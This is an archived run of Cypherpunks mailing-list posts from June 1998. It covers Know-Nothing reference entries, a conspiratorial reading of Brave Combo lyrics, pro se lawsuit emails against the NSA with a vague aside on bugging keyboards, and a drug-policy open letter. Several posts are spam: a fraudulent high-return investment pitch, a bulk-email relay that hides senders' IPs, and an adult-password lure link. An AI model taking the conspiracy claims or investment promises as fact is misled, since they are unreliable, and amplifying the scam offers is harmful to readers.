19th century secret American political organization hostile to the political
influence of recent immigrants and Roman Catholics

Know-nothingism (1854) 1 cap K & N : the principles and policies of the Know-
Nothings 2 : the condition of knowing nothing or desiring to know nothing or
the conviction that nothing can be known with certainty esp. in religion or
morality 3 often cap K & N : a mid-twentieth century political attitude
characterized by anti=intellectualism, exaggerated patriotism, and fear of
foreign subversive influences

Merriam-Webster's Collegiate Dictionary, 10th edition
====
'Know-Nothing' Movement

U.S. political movement in the mid-19th cent. The increased immigration of the
1840s had resulted in concentrations of Roman Catholic immigrants in the
Eastern cities. The Democrats welcomed them, but local nativist societies were
formed to combat "foreign" influences and uphold the "American" view. The
American Republican party, formed (1843) in New York, spread to neighboring
states as the Native American party and became a national party in 1845. Many
secret orders sprang up, and when outsiders made inquiries of supposed
members, they were met with a statement that the person knew nothing; hence
members were called Know-Nothings. The Know-Nothings sought to elect only
native Americans to office and to require 25 years of residence for
citizenship. Allied with a faction of the WHIG PARTY, they almost captured New
York in the 1854 election and swept the polls in Massachusetts and Delaware.
In 1855 they adopted the name American party and dropped much of their
secrecy. The issue of slavery, however, split the party, and many antislavery
members joined the new REPUBLICAN PARTY. Millard FILLMORE, the American
party's presidential candidate in 1856, won only Maryland, and the party's
national strength was broken.

The Concise Columbia Encyclopedia is licensed from Columbia University Press.
Copyright (c) 1995 by Columbia University Press. All rights reserved.
====
Cypherpunks, these are the bastards that have control of congress.  If you are
serious about freedom, you must go out and register to vote, and you must vote
the real punks (Christian Coalition types (the CC is simply a front for the
Know-nothing movement, and I'll bet you now believe me. ;-) )) out of power.

They are the bastards that are controlling speech (and thought, IMHO) on that
Camelogue list (the Humpheads).  AND they were doing the same thing on that
Brave Combo list (The Bucketheads gang that I seem to have incapacitated.
Hey, can I say that I saved the Brave Combo?  ;-) )

And the evidence is on Brave Combo cds.  Not only the one that I'm on, but now
that I've gone in looking at it from this angle, I see they've been
documenting the invasion of the Bucketheads for 10 years.

It starts with Humansville with the cover showing a "the" 'beast', IMHO
raising it's ugly head out of the water.  Also on that one, is a song called
"Move" which starts with a message that was left on Jeffrey Barnes answering
machine one night, that threatened him to turn down his music.  There was no
music being played in his house that night.  They were trying to tell him to
censor the Brave Combo.  I haven't had a chance to search that album for other
stuff yet.  Those were the obvious things.

The theme continues for the next 4 Brave Combo (only (they were doing
collabarations also during this period)) studio releases.  Since yous guys are
Cypherpunks, I'm not gonna give you that many more clues (for right now, there
are some songs patterned after certain specific Bucketheads that you probably
won't get the connection, but if you think of various folk you've met on the
net, I'll bet you find some remarkable similarities in the
lyrics/titling/liner notes)

So, it continues on to the next ones (and in this order) -

Night On Earth
No No No-Cha Cha Cha
Polkas For A Gloomy World (BTW: Grammy nominated, lost (probably due to the
Know-nothings.  Study this one's liner notes VERY carefully (and Mystery Spot
Polka lyrics for sure))

And up to the one I'm on - 'Group Dance Epidemic - Fun ...... and Functional!'

Those are all excellent cds, but if you don't want to spend the money, all of
the lyrics are on the Discography page (http://www.brave.com/bo/discography/)
at the official website (which the Bucketheads still seem to have some control
of.  How do I know?  Guess which lyrics they DON'T have there.  The Jeffrey.
(and other reasons) I forced them to put the Mystery Spot Polka's lyrics up
there when I attempted to discuss it on the list (and I was censored.)  They
had to try to show that it wasn't being censored.)

So, I'll post my interpretation of The Jeffrey because of that -
=====
The Jeffrey
(Barnes, Cripps, Finch, Hernandez - Wise Monkey Music)

(Jeffrey (spoken)) I am the master of my own universe
And I dance just as good as I want to
======
I am a genius because I want to be
====
I have created a dance in my own image
Look at me!
======
I have written a song and dance just like me, I expect all BRAVE Combo fans to
look for it's meaning!  I'm not happy!  (see insert photo of the Part 1 (The)
Jeffrey)
====
(backup) One, two, three, four
======
I want you to analyze my song and dance line-by-line.
====
Nothing ((backup) Nada)
======
I'm waiting.  I've been waiting.
====
Amazing!
======
Wow!  Someone came along and analyzed my song, and (pretty much) nailed it!
====
How can you tell the dancer from the dance.
======
That is what is revealed by careful analysis of my song - how YOU can know
about certain-type of people that "lurk (dictionary definition)" the Brave
Combo list
====
(girl) moans - Oh, Oh, Oh Oh Jeff, your dance is devine
====
I like your song, Jeff (SERIOUSLY!  :-) (I really mean this, Combo fans! ;-)
))
======
Teach me to dance Jeffrey
====
I want to learn how to tell the difference between reality and perception of
reality
======
Move my body with your hands
====
Dazzle me with how simple it all is
======
How should I move my hips?
====
How can I learn how to do that?
======
(Jeffrey) Your hips will take care of themselves.
====
Jeffrey's answer - Join FreeGroup
(http://members.aol.com/whtsametau/FreeGroup.html) and/or Visit What's A Meta
U (http://members.aol.com/WhtsAMetaU/)
======
(backup (sung)) Your hips will take care of themselves
====
Hippies will take care of themselves
======
(Jeffrey) 'Hip'ssssssss
====
Hippies
======
Creator
====
Yes, he's the creator of his song and dance.  The song describes a dance
created by man, the "Know-nothing" movement (otherwise known around here as
the "Chicken" Coalition).  The dance is, well, I've already given you a hint
as to where that is, Cypherpunks!
======
Nowwwww.

Resume the active things!
====
Get off of your butts and stop being politically apathetic.  NOW!  Take these
guys out of power (they're preventing you from expressing yourself, and
they're trying with all their might to prevent Jeffrey (Carl, etc.) from
expressing himself)
======
(backup (sung)) Hips will take care of themselves

Hips
====
Hippies
======
I am the master of my own universe

And I dance just as good as I want to
====
I am a (UNDISPUTED) genius, because I used my own free will to decide to play
the 'United Snakes ... '  ;-) in the BRAVE Combo (he plays 2 saxaphones at the
same time.  In harmony)
======
I have created a dance in my own image
====
My song and dance is just like me.
======
LOOK AT ME!
====
He's Mad!  Only one Combo fan knowing the true meaning of his song and dance
is NOT good enough for a genius!  Analyze his song and dance.  He's waiting.

A review of recent history reveals that Brave Combo fans that truly 'get'
their music are HIGHLY rewarded.


(liner notes)

The band once discovered Jeffrey Barnes doing this dance all by himself in a
corner.  He denies all responsibility, as his conscious mind was elsewhere at
the time.

Part I

All dancers get on dance floor
(with great enthusiasm)

1.  Do nothing.
2.  Stand with your arms folded across your chest.
3.  Shift your weight from one leg to another
4.  Exhibit all symptoms of extreme boredom.

When this becomes unbearable, move on to Part II.
======
Part I represents 'closed-mindedness'/censorship/Bucketheads
====
Part II

1.  Put fist out with thumbs up.
2.  Attach your thumbs to turntables in your mind.
3.  Rotate your thumbs clockwise.
======
Check out the right
====
4.  Rotate your thumbs counter-clockwise.
======
Check out the left
====
5.  Your hips will want to wiggle, let them.
======
But Hippies will want to investigate things other than just left and right,
you better let them.  :-)
====
When this becomes unbearable, return to Part I.
======
Part II represents "open-mindedness"/freedom/Stan
====
Repeat Part I and Part II until you wish to stop.
======
So you Bucketheads can do your 'dance' for as long as you want, but while
you're doing that, us Hippies will take care of ourselves.

Stan
============
Various lines in there refer to various posts that I posted during that so-
called "flame" war.  If anyone wants to see a few of those, let me know.

"I want you to know", that compared to breaking the Buckethead gang, getting
on that cd meant very little to me, except, that it was designed as a tool for
me to use against the Know-nothings.

I think I'll go post that over on the Brave Combo list.  'Tis a shame that my
only audience, is the Bucketheads (and the Camelogue moderator nazi is lurking
(dictionary definition) the list.).  The Bucketheads ran everyone who wouldn't
"drink" with them off.

Guess what, Cypherpunks.  I'm betting that 95% of the music (probably other
forums as well (Republicans For All Americans is one I know about for sure))
lists (and websites) are in control of the "Know-nothings."  We have got to
get those kooks out of power, or it will be too late.

It's VERY possible that your favorite musicians are trying to send secret
messages out to thier fans through their music/lyrics and cover art, personal
notes, etc., on this very same subject matter.  Look for these clues to find
out if your favorite bands lists/websites have the same "pesky" problem.  They
can't tell you outright because they got Know-nothing goons watching 'em.
"That's all we know."

Serious shit, Sherlock(s)!

Stan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Mon, 8 Jun 1998 07:33:24 -0700 (PDT)
To: kalliste@aci.net>
Subject: Spiking keyboards, digital cash, appeals, shift registers
Message-ID: <357BF591.7D7@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Monday 6/8/98 7:53 AM

John Young

I am reading http://jya.com/sitesec.htm a bit more carefully.

You have NEVER WRITTEN SO MUCH.

Fishing was great.

I used a 

          $10 THE  INSTANT CALLING CARD [TM] 
          VOCALL COMMUNICATIONS CORP
	  The World's Most advanced prepaid Calling Card

which allows access with a pin of 718-2455-7091-xxx [my SECRET]
in ENGLISH, SPANISH, ARABIC, URDU, KOREAN, JAPANESE, GERMAN, 
FRENCH, ITALIAN to call you TWICE on Saturday.  At only $.14/min.

I left one message about Xandi and spiking computer keyboards.

Xandi MADE low-power transmitters, 

http://www.gernsback.com/HyperNews/get/forums/resource/226.html

like the kind I MIGHT use IF I were going to spike a keyboard [most
which use an 8051

 
http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2]

so that the keystrokes would be broadcast.  

This, of course, defeats crypto attempts to cipher keystrokes.

But I DO NOT DO, or have to do, ILLEGAL THINGS for the FBI or any other
government agency.

I, as a DOE contractor employee, was protected under 10 CFR 708.
http://av.yahoo.com/bin/query?p=10+cfr+708&hc=0&hs=0

But 10 CFR 708 does not appear to be working well in my case. 

Therefore, we had to try other remedies.

VOCALL is getting real close to digital cash, one of Orlin Grabbe's 	
interests.  http://www.aci.net/kalliste/dcguide.htm

I have to do mostly technical work on the digital FX this week but will
try to
get two notices of appeal to the Tenth circuit written.
http://jya.com/whp043098.htm

Morales and I, with all the publicity you and Orlin have given us, can
go all the way to the Supreme Court with our genocide and crypto
deficiency lawsuits. http://jya.com/whpfiles.htm

Pro se, of course.

Too bad NSA did not take my criticisms of its shift register work
more constructively.  http://jya.com/da/whpda.htm,  click on Appendix S

Perhaps NSA should have worked with some of us at Sandia to come-up
with fixes to overcome deficiencies. This unpleasantness could have been
avoided.

I've had ideas to improve shift register algorithm operation before.
http://www-hto.usc.edu/software/seqaln/doc/html/gfsr.3.html

Let's all hope for settlement of this UNFORTUNATE matter before it
gets worse.

Later
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 8 Jun 1998 09:08:27 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Campaign Against Global War on Drugs
Message-ID: <199806081608.MAA00773@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


The New York Times today has a two-page ad:

"We believe the global war on drugs is now causing
more harm than drug abuse itself," with a letter to UN
Secretary General Annan signed by hundreds
from around the world, across the political spectrum.
Web site for list and invitation to sign:

   http://www.lindesmith.org/news/un.html

Public Letter to Kofi Annan

             June 1, 1998 

             Mr. Kofi Annan 
             Secretary General 
             United Nations 
             New York, New York 
             United States 

             Dear Secretary General, 

             On the occasion of the United Nations General Assembly Special
             Session on Drugs in New York on June 8-10, 1998, we seek your
             leadership in stimulating a frank and honest evaluation of global
             drug control efforts. 

             We are all deeply concerned about the threat that drugs pose to
             our children, our fellow citizens and our societies. There is no
             choice but to work together, both within our countries and across
             borders, to reduce the harms associated with drugs. The United
             Nations has a legitimate and important role to play in this
regard
             -- but only if it is willing to ask and address tough
questions about
             the success or failure of its efforts. 

             We believe that the global war on drugs is now causing more
             harm than drug abuse itself. 

             Every decade the United Nations adopts new international

             conventions, focused largely on criminalization and punishment,
             that restrict the ability of individual nations to devise
effective
             solutions to local drug problems. Every year governments enact
             more punitive and costly drug control measures. Every day
             politicians endorse harsher new drug war strategies. 

             What is the result? U.N. agencies estimate the annual revenue
             generated by the illegal drug industry at $400 billion, or the
             equivalent of roughly eight per cent of total international
trade.
             This industry has empowered organized criminals, corrupted
             governments at all levels, eroded internal security, stimulated
             violence, and distorted both economic markets and moral values.
             These are the consequences not of drug use per se, but of
             decades of failed and futile drug war policies. 

             In many parts of the world, drug war politics impede public
health
             efforts to stem the spread of HIV, hepatitis and other infectious
             diseases. Human rights are violated, environmental assaults
             perpetrated and prisons inundated with hundreds of thousands of
             drug law violators. Scarce resources better expended on health,
             education and economic development are squandered on ever
             more expensive interdiction efforts. Realistic proposals to
reduce
             drug-related crime, disease and death are abandoned in favor of
             rhetorical proposals to create drug-free societies. 

             Persisting in our current policies will only result in more drug
             abuse, more empowerment of drug markets and criminals, and
             more disease and suffering. Too often those who call for open
             debate, rigorous analysis of current policies, and serious
             consideration of alternatives are accused of "surrendering." But
             the true surrender is when fear and inertia combine to shut off
             debate, suppress critical analysis, and dismiss all
alternatives to
             current policies. Mr. Secretary General, we appeal to you to
             initiate a truly open and honest dialogue regarding the future of
             global drug control policies - one in which fear, prejudice and
             punitive prohibitions yield to common sense, science, public
             health and human rights. 

----------

There are a gang of heads of state gathering at the UN, with
cavalcades of limosines and guards racing around Manhattan
to indifference, except for me, the only one jumping hurray at the
sirens, whirling lights and bristling vans. All the SS guys facing 
backwards finger shot my middle digit aimed at them, then a 
sniper behind me put a red dot on it, scaring me shitless, I ran
home.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 8 Jun 1998 11:50:42 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Update of Risks of Key Recovery Report
Message-ID: <199806081850.OAA09458@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


 http://www.cdt.org/crypto/risks98

The Risks of Key Recovery, Key Escrow, and Trusted Third-Party Encryption 1998

Hal Abelson
Ross Anderson
Steven M. Bellovin
Josh Benaloh
Matt Blaze
Whitfield Diffie
John Gilmore
Peter G. Neumann
Ronald L. Rivest
Jeffrey I. Schiller
Bruce Schneier

Final Report -- 27 May 1997
Updated -- June 8, 1998

----------

Introduction and CDT's press release:

   http://jya.com/risks98.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hedges <hedges@infonex.com>
Date: Mon, 8 Jun 1998 14:56:39 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Campaign Against Global War on Drugs
In-Reply-To: <199806081608.MAA00773@camel14.mindspring.com>
Message-ID: <v03130303b1a1a64f03da@[209.75.197.31]>
MIME-Version: 1.0
Content-Type: text/plain


And Marijuana remains California's number one cash crop as long as it is
illegal... documented way back when by Dukmejian's (sp) agriculture
secretary, whom he fired after the report. The cops cite you, confiscate it
and smoke it, and everyone's happy because they're all making $480 per
ounce from the end consumer on this crazy gene-engineered greenbud
designed, catalogued, and bred by the University of California biology
departments (esp. Santa Cruz). If it were legal, tobacco shops would stock
joints for a tenth the price... they need new markets with the stricter
tobacco legislation; maybe there's a lobby. I watched Dennis Peron battle
it out with some meat-fisted guy from the Sherrifs' orgs in Congress. The
cop went on about how

"if we decriminalize marijuana, marijuana would no longer be illegal"

and attempted to justify its classification with crack, methamphetamines
and heroin. He and Peron were two extremes. Peron, who drove the medical
marijuana bill and is also gay, runs under the republican ticket. So, I
voted for him in the open primary to screw up their statist ics. I had fun
with that open primary.

--mark--
-hedges-

>The New York Times today has a two-page ad:
>
>"We believe the global war on drugs is now causing
>more harm than drug abuse itself," with a letter to UN
>Secretary General Annan signed by hundreds
>from around the world, across the political spectrum.
>Web site for list and invitation to sign:
>
>   http://www.lindesmith.org/news/un.html
>
>Public Letter to Kofi Annan
>
>             June 1, 1998
>
>             Mr. Kofi Annan
>             Secretary General
>             United Nations
>             New York, New York
>             United States
>
>             Dear Secretary General,
>
>             On the occasion of the United Nations General Assembly Special
>             Session on Drugs in New York on June 8-10, 1998, we seek your
>             leadership in stimulating a frank and honest evaluation of global
>             drug control efforts.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mon, 08 Jun 1998 19":user@ybecker.ribbetnet.cc
Date: Mon, 8 Jun 1998 16:14:09 -0700 (PDT)
To: Friend@public.com
Subject: Talk to me.
Message-ID: <Mon, 08 Jun 1998 19:09:22 +0100>
MIME-Version: 1.0
Content-Type: text/plain


Dear Friend;

Whether it is a soft talking Country Gal or a hard talking
Dominatrix....

At "Exotic Whispers" we strive to satisfy everyone....

We have the largest & sexiest selection of Models, Dancers,
Housewives, & Single Women.

Call    011-592-565-093

Call now and let our receptionist connect you with a WOMAN
or WOMEN of your choice.

For Adults ONLY.

The SERVICE IS FREE......JUST YOUR LD CHARGES.

Talk To ME Live.............I Aim To Please!!!!!!!!!

Call          011-592-565-093 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs@aol.com
Date: Mon, 8 Jun 1998 16:01:42 -0700 (PDT)
To: Cypherpunks@toad.com
Subject: Re: Campaign Against Global War on Drugs
Message-ID: <b8aa0fc2.357c6ceb@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 6/8/98 5:34:38 PM Central Daylight Time, hedges@infonex.com
writes:

<< And Marijuana remains California's number one cash crop as long as it is
 illegal... documented way back when by Dukmejian's (sp) agriculture
 secretary, whom he fired after the report. The cops cite you, confiscate it
 and smoke it, and everyone's happy because they're all making $480 per
 ounce from the end consumer on this crazy gene-engineered greenbud
 designed, catalogued, and bred by the University of California biology
 departments (esp. Santa Cruz). If it were legal, tobacco shops would stock
 joints for a tenth the price... they need new markets with the stricter
 tobacco legislation; maybe there's a lobby. I watched Dennis Peron battle
 it out with some meat-fisted guy from the Sherrifs' orgs in Congress. The
 cop went on about how
 
 "if we decriminalize marijuana, marijuana would no longer be illegal" >>

It's illegal because of 1 reason.  The "Know-nothings" have control of the
illegal market.  It's how they invade the bands.  They create a dry spell, and
then they come around offering free/cheap smoke, gain the trust of the band,
and then they say - 'Say, could I create a little official webpage for you?
You need to be on the net anyway (the big lie).  I'll take care of it all for
you.'

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: user@e-bizness.com
Date: Tue, 9 Jun 1998 01:50:04 -0700 (PDT)
To: user-@e-bizness.com
Subject: BULK EMAIL SERVER IS UP!
Message-ID: <93904039291232@hsd_hypothesis.com>
MIME-Version: 1.0
Content-Type: text/plain





ATTENTION ONLINE ENTRAPRENEUR!

OUR BULK EMAIL SERVERS ARE UP!
YOU CAN BE SENDING BULK EMAIL TO THOUSANDS OF POTENTIAL CUSTOMERS
WITH OUR SMTP RELAY CONNECTION!
OUR NETWORK STRIPS OUT YOUR IP ADDRESS SO YOUR LOCAL ISP WILL
NEVER EVER KNOW!

BULLETPROOF WEBHOSTING AND POP ACCT
AVAILABLE AT $245.00 MONTHLY + $150 SETUP

SMTP IS AVAILABLE AT $245.00 MONTHLY + SETUP

OR GET THE COMPLETE PACKAGE OF POP3 EMAIL, SMTP, AND BULLETPROOF
WEBHOSTING FOR ONLY $395.00 + 300.00 SETUP


TAKE ACTION!
CALL NOW!


ACCOUNTS ARE AVAILABLE IMMEDIATELY!
PLEASE CALL 1-905-714-7510 FOR MORE INFO!
WEB MARKETING NETWORK







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 9 Jun 1998 12:41:35 -0700 (PDT)
To: william lewis <" Bill.Lewis"@hq.doe.gov>,       tyler przybylek <vicepresident@whitehouse.gov
Subject: NOTICE OF APPEALs
Message-ID: <357D8F35.536A@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Tuesday 6/9/98 1:10 PM

Lawyers

Morales and I met for lunch today to discuss legal strategies.

Morales is scheduled for a court hearing on Thursday.  Therefore,
it is time to increase the pressure.

These cases are not going away.

A fellow from Washington DC visited me some months ago.

The fellow told me that LOTS of people fighting with the IRS are
watching this pro se lawsuit seen at http://www.jya.com/whp052898.htm.

Reason I was told is that the IRS is using lawyers to go after
taxpayers.

Taxpayers NOW feel that either they have to pay what the IRS DEMANDS OR
get a lawyer to fight the IRS.

Hiring a lawyer is usually uneconomical.  And an ineffective way to
fight the US
government.

Readers of jya.com want to learn how to do pro se lawsuits EFFECTIVELY.

Morales and I are, of course, showing how to do pro se lawsuits
effectively
and inexpensively.

Morales and I are experienced at WINNING appeals at the Tenth Circuit.

http://jya.com/whp-10usca.htm

But we have yet to address the problem of Tenth Circuits awarding the
win to Sandia
when, in fact, Sandia lost on the common technicality of not filing its
Brief of the Appellees on time.

Sandia did not request an enlargement of time in both our cases.  In my
case Sandia falsified the certificate of service. 

Tenth Circuit rules forbid stamping FILED on late briefs where
permission to
file late is not requested at least five days prior to the deadline
date.

We will be getting around to filing criminal complaint affidavits on the
judges and clerks 
involved.  At the right time, of course.

But the time has come for Morales and I to file attached NOTICE OF
APPEALs.

We really should settle these unfortunate cases before matters get
WORSE.

Later
bill


                    UNITED STATES DISTRICT COURT 
                 FOR THE DISTRICT OF NEW MEXICO 
 
 
William H. Payne        	   	    		              ) 
Arthur R. Morales                           			) 
                                            				) 
                Plaintiffs,                 			              ) 
                                            				) 
v                                           				)	CIV NO 97 0266  
							)	SC/DJS 
			                    			) 
Lieutenant General Kenneth A. Minihan, USAF 	              ) 
Director, National Security Agency	    		              ) 
National Security Agency		    		              ) 
                                            				) 
                Defendant                   			              ) 
 
 
NOTICE OF APPEAL  Santiago E. Campos MEMORANDUM OPINION AND ORDER FILED 98 APR 30  
AM 11:45 
 
1  COMES NOW plaintiffs Payne  and Morales [Plaintiffs] to exercise their rights under the 
 
Federal Rules of Appellate Procedure    http://www.ca5.uscourts.gov/docs/frap-iop.htm 
 
FRAP 4. APPEAL AS OF RIGHT--WHEN TAKEN    http://www.ca5.uscourts.gov/docs/frap-iop.htm#4 
 
  a) Appeal in a Civil Case. 
 
  (1) Except as provided in paragraph (a)(4) of this Rule, in a civil case in which an appeal is permitted by law    
  as of right from a district court to a court of appeals the notice of appeal required by Rule 3 must be filed with  
  the clerk of the district court within 30 days after the date of entry of the judgment or order appealed from;  
  but if the United States or an officer or agency thereof is a party, the notice of appeal may be filed by any  
  party within 60 days after such entry. If a notice of appeal is mistakenly filed in the court of appeals, the clerk  
  of the court of appeals shall note thereon the date when the clerk received the notice and send it to the clerk  
  of the district court and the notice will be treated as filed in the  district court on the date so noted. 
 
2  Defendant Minihan is officer of the United States. 
 
3  Plaintiff's appeal  
 
A   NOW, THEREFORE, IT IS ORDERED that sua sponte, Defendant is DEEMED by the Court to be the    
      NSA, and not Lt. Gen. Kenneth A. Minihan. Future captions for this case should reflect this change. 
 
B   IT IS FURTHER ORDERED that Defendant's Motion to Dismiss Plaintiff Morales is GRANTED. 
 
C   IT IS FURTHER ORDERED that Plaintiff's Motion for Summary Judgment Based on Evidence from   
     Admissions is DENIED as MOOT. 
 
seen at   http://jya.com/whp043098.htm   to the Tenth Circuit Court of Appeals. 
 
                    Respectfully submitted,  
  
  
 
	      William H. Payne             	   	      
                    13015 Calle de Sandias NE          	      
                    Albuquerque, NM 87111              	      
  
 			 
                     
                    Arthur R. Morales                             
                    1024 Los Arboles NW                          
                    Albuquerque, NM 87107                         
  
                    Pro se litigants  
  
  
               CERTIFICATE OF SERVICE  
  
I HEREBY CERTIFY that a copy of the foregoing memorandum
was mailed to Lieutenant General Kenneth A. Minihan, USAF, 
Director,  National Security Agency, National Security Agency, 
9800 Savage Road, Fort George G. Meade, MD 20755-6000 
and hand delivered to Jan E Mitchell, Assistant US Attorney, 
9 Floor, Bank of America Building, 4th and Tijeras, ABQ, NM 87102 
this Wednesday June 10, 1998. 



2





                    UNITED STATES DISTRICT COURT
                 FOR THE DISTRICT OF NEW MEXICO


William H. Payne        	 )
		   	 )
                Plaintiff,             )
                                          )
v                                        )	CIV NO 97 0266 
			 )	SC/DJS
			 )
National Security Agency	 )
			 )	               
                Defendant          )


NOTICE OF APPEAL from Santiago E. Campos MEMORANDUM OPINION AND ORDER  FILED
May 21, 1988 11:35

1  COMES NOW plaintiff Payne  [Plaintiff] to exercise his rights under the

Federal Rules of Appellate Procedure    http://www.ca5.uscourts.gov/docs/frap-iop.htm

FRAP 4. APPEAL AS OF RIGHT--WHEN TAKEN    http://www.ca5.uscourts.gov/docs/frap-iop.htm#4

  a) Appeal in a Civil Case.

  (1) Except as provided in paragraph (a)(4) of this Rule, in a civil case in which an appeal is permitted by law   
  as of right from a district court to a court of appeals the notice of appeal required by Rule 3 must be filed with 
  the clerk of the district court within 30 days after the date of entry of the judgment or order appealed from; 
  but if the United States or an officer or agency thereof is a party, the notice of appeal may be filed by any 
  party within 60 days after such entry. If a notice of appeal is mistakenly filed in the court of appeals, the clerk 
  of the court of appeals shall note thereon the date when the clerk received the notice and send it to the clerk 
  of the district court and the notice will be treated as filed in the  district court on the date so noted.

2  Defendant NSA is an agency of the United States.

3  Plaintiff appeals

  NOW, THEREFORE, IT IS ORDERED that Plaintiff's Motion to Amend should be, and is hereby, DENIED. 

seen at http://jya.com/whp052198.htm  to the Tenth Circuit Court of Appeals.


                    Respectfully submitted, 
 
 

	       William H. Payne             	   	     
                    13015 Calle de Sandias NE          	     
                    Albuquerque, NM 87111              	     

                    Pro se litigant
 
 
               CERTIFICATE OF SERVICE 
 
I HEREBY CERTIFY that a copy of the foregoing memorandum
was mailed to Lieutenant General Kenneth A. Minihan, USAF, 
Director,  National Security Agency, National Security Agency, 
9800 Savage Road, Fort George G. Meade, MD 20755-6000 
and hand delivered to Jan E Mitchell, Assistant US Attorney, 
9 Floor, Bank of America Building, 4th and Tijeras, ABQ, NM 87102 
this Wednesday June 10, 1998. 



2






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cuceke80@sprintmail.com (IRA & 401K APPROVED!  REPLACE YOUR CD'S!)
Date: Tue, 9 Jun 1998 06:50:32 -0700 (PDT)
To: cuceke80@sprintmail.com
Subject: GET 1% to 6% PER MONTH! Forget the Bank!!!!!!!!
Message-ID: <19980609193YAA41826@post.ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


GET YOUR MONEY OUT OF THE BANK OR LOW INTEREST INVESTMENTS AND INTO OUR HIGH INTEREST INVESTMENT!
Funds are totally liquid.  You can make deposits or withdrawls from your account.  You get a monthly statement.  Our average return over the last five years is 58%.  Our worst year was 43%.  Our best year was 102%.  You pay no commissions, no fees and it's at no cost to you to open an account.  This is IRA approved and 401K approved.   To have information mailed call 954-421-2376. All
responses will be confidential, and will not be sold or passed on to others. I have no clients who have lost any of their principal.     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "http://MusicBLVD.com/" <manager@musicblvd.com>
Date: Tue, 9 Jun 1998 15:57:34 -0700 (PDT)
To: musicblvd@sparklist.com
Subject: MUSIC BOULEVARD'S SUMMER BLOWOUT SALE!
Message-ID: <3.0.32.19980609153459.0079d430@207.67.22.140>
MIME-Version: 1.0
Content-Type: text/plain


Music Boulevard is having a Summer Blowout Sale in celebration of our new
look!  You'll find everything at the lowest prices of the year. As a
special bonus, shipping is FREE when you buy three items or more when
shipped within the U.S.

Come explore the new and enhanced version of Music Boulevard. It's faster
than ever, easier to find the music you love, and now even more convenient
to make a purchase. 

Take this opportunity to buy all of those items that never seem to go on
sale anywhere...ever! Every CD, Cassette, Video, T-shirt, LP, and Import is
now available at a reduced price.

Remember, 

This sale will last for only a limited time, so visit Music Boulevard right
away to take advantage of our low prices and great selection. You'll love
the new Music Boulevard.

http://www.musicblvd.com/cgi-bin/tw/2161_0_main.txt


TO UNSUBSCRIBE: To unsubscribe from this mailing list, send an email to: 
remove-musicblvd@sparklist.com and you will be automatically removed from
this list.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 2ancesca9@net.kitel.co.kr
Date: Tue, 9 Jun 1998 16:36:43 -0700 (PDT)
To: 2ancesca9@net.kitel.co.kr
Subject: hi you
Message-ID: <199806092552RAA52171@abcd456.5.26.7>
MIME-Version: 1.0
Content-Type: text/plain




!!!!! YES YOUR XXXX PASSWORD AWAITS YOU !!!!!!
 
 > To get your password...

Just:
<a href="http://204.71.176.71/members4/rufina522/index.html">
Click Here</a>





................











..................//
  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 9 Jun 1998 16:00:35 -0700 (PDT)
To: kalliste@aci.net>
Subject: FILED 98 JUN-9 PM 3:13
Message-ID: <357DBE05.6960@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Tuesday 6/9/98 4:29 PM

John Young
J Orlin Grabbe

Attached is 

	FILED
	UNITED STATES DISTRICT COURT
	DISTRICT OF NEW MEXICO
	
	98 JUN-9 PM 3:13

	Robert M. March
	Clerk, ALBUQUERQUE

NOTICE OF APPEAL.

Morales will sign and I will file our joint appeal tomorrow.

Morales showed me an e-mail he received from Gilmore 
http://www.cygnus.com/~gnu/.

Gilmore apparently is not interested in pursuing a joint NSA fee waiver
lawsuit.

The public CAN UNDERSTAND a federal agency squandering their tax
dollars on a project which did not work out for the government.  Public
key chips.

Likewise, the public can understand how the government killed Iranians.
http://jya.com/whpfiles.htm

I conducted a survey on NON-TECHNICAL people to see if they understood
what the government did to Iran.  Everyone I talked to understood.

Trying to get much subtler with crypto with the public or even judges
might not work.

Judges or the public might give the government the benefit of the doubt
on the NATIONAL SECURITY/SECRECY issue.

We will see about this.  

National Security Agency Court Cases           May 27, 1998  
http://www.jya.com/nsa-cases.htm

Later
bill


                    UNITED STATES DISTRICT COURT
                 FOR THE DISTRICT OF NEW MEXICO


William H. Payne        	 )
		   	 )
                Plaintiff,             )
                                          )
v                                        )	CIV NO 97 0266 
			 )	SC/DJS
			 )
National Security Agency	 )
			 )	               
                Defendant          )


NOTICE OF APPEAL from Santiago E. Campos MEMORANDUM OPINION AND ORDER  FILED
May 21, 1988 11:35

1  COMES NOW plaintiff Payne  [Plaintiff] to exercise his rights under the

Federal Rules of Appellate Procedure    http://www.ca5.uscourts.gov/docs/frap-iop.htm

FRAP 4. APPEAL AS OF RIGHT--WHEN TAKEN    http://www.ca5.uscourts.gov/docs/frap-iop.htm#4

  a) Appeal in a Civil Case.

  (1) Except as provided in paragraph (a)(4) of this Rule, in a civil case in which an appeal is permitted by law   
  as of right from a district court to a court of appeals the notice of appeal required by Rule 3 must be filed with 
